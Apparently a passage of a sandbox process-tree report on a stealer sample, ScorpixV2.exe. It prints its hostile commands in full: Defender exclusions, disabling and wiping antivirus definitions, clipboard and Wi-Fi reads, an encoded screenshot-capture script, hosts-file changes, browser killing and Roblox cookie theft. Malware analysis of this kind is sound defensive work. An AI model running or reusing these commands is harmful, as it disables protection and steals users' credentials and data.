  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,12883561193119825858,5849103300709148547,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4500 /prefetch:1
  2⤵
  PID:2872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,12883561193119825858,5849103300709148547,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4800 /prefetch:8
  2⤵
  PID:2596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4964,i,12883561193119825858,5849103300709148547,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4976 /prefetch:8
  2⤵
  PID:5388

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4316

C:\Users\Admin\Downloads\ScorpixV2.exe
"C:\Users\Admin\Downloads\ScorpixV2.exe"
1⤵
- Executes dropped EXE
PID:1460
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:5612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'"
    3⤵
    PID:2268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4160
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:5776
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:5852
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ ‍.scr'"
    3⤵
    PID:5640
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ ‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5604
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:6004
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1984
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5480
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2744
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5900
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1248
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3780
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nbpcpsz4\nbpcpsz4.cmdline"
        5⤵
        
        PID:3436
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES773A.tmp" "c:\Users\Admin\AppData\Local\Temp\nbpcpsz4\CSCB5DA411E883848A08DD8858421A21088.TMP"
        6⤵
        
        PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5384
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4428
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4708
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3092
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2556
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5808
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5864
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1012
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2316
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5576"
    3⤵
    PID:1092
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5576
      4⤵
      Kills process with taskkill
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5576"
    3⤵
    PID:5732
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1984
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5576
      4⤵
      Kills process with taskkill
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4988"
    3⤵
    PID:5596
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2140
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4988
      4⤵
      Kills process with taskkill
      PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4988"
    3⤵
    PID:2268
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4988
      4⤵
      Kills process with taskkill
      PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4492"
    3⤵
    PID:3176
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1244
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4492
      4⤵
      Kills process with taskkill
      PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4492"
    3⤵
    PID:3248
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4492
      4⤵
      Kills process with taskkill
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1440"
    3⤵
    PID:1520
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1440
      4⤵
      Kills process with taskkill
      PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1440"
    3⤵
    PID:5704
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2744
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1440
      4⤵
      Kills process with taskkill
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2988"
    3⤵
    PID:3304
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2988
      4⤵
      Kills process with taskkill
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2988"
    3⤵
    PID:5736
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2988
      4⤵
      Kills process with taskkill
      PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2728"
    3⤵
    PID:5760
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2728
      4⤵
      Kills process with taskkill
      PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2728"
    3⤵
    PID:5404
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2376
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2728
      4⤵
      Kills process with taskkill
      PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6056"
    3⤵
    PID:2956
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 6056
      4⤵
      Kills process with taskkill
      PID:5568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6056"
    3⤵
    PID:2316
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 6056
      4⤵
      Kills process with taskkill
      PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2872"
    3⤵
    PID:5532
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2872
      4⤵
      Kills process with taskkill
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2872"
    3⤵
    PID:5312
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2872
      4⤵
      Kills process with taskkill
      PID:6012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1064
